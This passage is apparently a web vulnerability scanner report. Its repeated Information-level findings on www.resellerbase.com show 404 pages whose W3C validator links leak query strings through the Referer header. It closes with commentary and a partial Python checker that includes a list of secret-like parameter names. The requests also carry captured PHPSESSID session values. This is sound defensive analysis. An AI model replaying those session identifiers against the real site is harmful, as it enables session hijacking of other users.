User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.198. http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/39/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.199. http://www.resellerbase.com/detail/39/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/39/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.200. http://www.resellerbase.com/detail/39/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/39/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.201. http://www.resellerbase.com/detail/39/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.202. http://www.resellerbase.com/detail/4/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.203. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/4/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.204. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.205. http://www.resellerbase.com/detail/4/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.206. http://www.resellerbase.com/detail/4/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.207. http://www.resellerbase.com/detail/40/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/40/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.208. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.209. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.210. http://www.resellerbase.com/detail/40/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.211. http://www.resellerbase.com/detail/40/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.212. http://www.resellerbase.com/detail/41/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/41/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.213. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.214. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...
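
Every finding in this section has the same shape: a request whose URL carries a query string receives a 404 page whose footer links to validator.w3.org and jigsaw.w3.org, and both links end in referer, which tells the W3C validators to take their target from the Referer header. A user who follows either link therefore hands the full query string of the originating page to a third party. In this run the query string holds only keyword=search...&Submit3=Search&opt=2 and the session identifier travels in the PHPSESSID cookie rather than the URL, so the Information rating is appropriate; the same footer on a page reached with a session or reset token in the URL would not be. The script below is an added example, not Burp's code and not part of the original report: it rebuilds the check over a constructed, trimmed copy of the 6.214 response body (with two same-origin links added for contrast) and adds a parameter-name triage hint that is this example's own heuristic, not the scanner's scoring.

```python
"""Cross-domain Referer leakage check, rebuilt over a captured response.

Added example. SAMPLE_URL and SAMPLE_BODY are constructed from finding 6.214:
the body is a trimmed copy of the 404 page with two same-origin links added.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SAMPLE_URL = ("http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php"
              "?keyword=search...&Submit3=Search&opt=2")

SAMPLE_BODY = """<html><head><title>Error 404 - Page Not Found</title></head><body>
<a href="/detail/41/">back</a>
<a href="http://www.resellerbase.com/themes/kosmos/">theme</a>
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" /></a>
</td></body></html>"""

# Parameter-name fragments that make a leaked query string worth more than
# "Information". Triage heuristic for this example only; "key" is deliberately
# absent so that a harmless "keyword" parameter does not trip it.
SENSITIVE_HINTS = ("sess", "sid", "token", "auth", "pass", "pwd", "secret")


class LinkCollector(HTMLParser):
    """Collect href values from <a> tags (anchors only, matching the scanner's
    check; embedded <img src> to other domains leaks the Referer on load too)."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def cross_domain_links(page_url, body):
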